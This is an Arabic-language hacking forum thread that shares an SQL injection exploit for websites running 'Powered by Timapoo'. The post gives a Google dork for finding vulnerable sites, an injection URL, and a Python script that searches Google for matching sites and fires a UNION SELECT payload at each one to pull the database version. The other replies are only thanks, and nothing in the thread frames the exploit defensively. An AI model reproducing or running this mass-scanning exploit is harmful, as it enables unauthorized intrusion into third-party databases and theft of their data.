1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Fox | المشاهدات : 468 | الردود : 2
الوسوم:
حالة الموضوع:
مغلق
  1. Fox Developer

    الأنتساب:
    ‏27 ديسمبر 2011
    المشاركات:
    81
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    30
    الإقامة:
    ŖĬỹДďҢ
    بسم الله الرحمن الرحيم

    السلام عليكم اخواني

    الثغرا من اكتشاف SoUiLaHxXx_Dz

    كود PHP:
    ####################################################################################
    # Title : Powered by Timapoo [sql injection]
    # Author : SoUiLaHxXx_Dz
    # Date : 06-20-2013
    ####################################################################################

    Dork :
     
    inurl:"dynamic.php?sys=faq" Powered by Timapoo

    exploit 
    :
     
    http://site/dynamic.php?sys=faq&action=new&la=[SQL]
    الاخ UzunDz نشر بوت واستغلال لها..

    كود PHP:
    #!C:\Python27\python.exe 
    '''  
        by Ali , UzunDz 
        UzunDz[at]gmail[dot]com 
        Sec4ever.com , dz-root.com 
        x00x-Team. 
        Vuln : Timapoo SQLi 
    ''' 
    from google import search 
    import urllib2
    ,re 

    def exploit_url
    (url): 
        try : 
            
    exp "dynamic.php?sys=faq&la=' div 0 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat(0x555a55,version(),0x4e445a),14,15,16%23" 
            
    target re.sub('dynamic.php(.*)','',url
            print 
    "Trying to inject : "+target 
            run 
    urllib2.urlopen(target+exp.replace(' ','%20')).read() 
            print 
    "Version : "+re.findall('UZU(.*)NDZ',run)[0
        
    except 
            
    pass 

    dork 
    'inurl:"dynamic.php?sys=faq" Powered by Timapoo' 
    for url in search(dork,stop=(100)): 
        if 
    'dynamic.php' in url
            
    exploit_url(url)

     
  2. Mstr Yaser <span style="font-weight: bold; text-shadow: #BBBB موقوف لمخالفة الشروط

    الأنتساب:
    ‏21 نوفمبر 2014
    المشاركات:
    353
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
    Facebook:
    YouTube:
    رد: Powered by Timapoo sql injection

    يعطيك العافية ~
     
  3. MR.CAPTCHA Expert Developer ExpErt DeveloPer

    الأنتساب:
    ‏30 أغسطس 2014
    المشاركات:
    1,786
    الإعجابات المتلقاة:
    14
    نقاط الجائزة:
    90
    الوظيفة:
    I.T Student
    الإقامة:
    IRAQ
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    C#
    Facebook:
    YouTube:
    رد: Powered by Timapoo sql injection

    شكراً جزيلاً
    {1!$8}
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة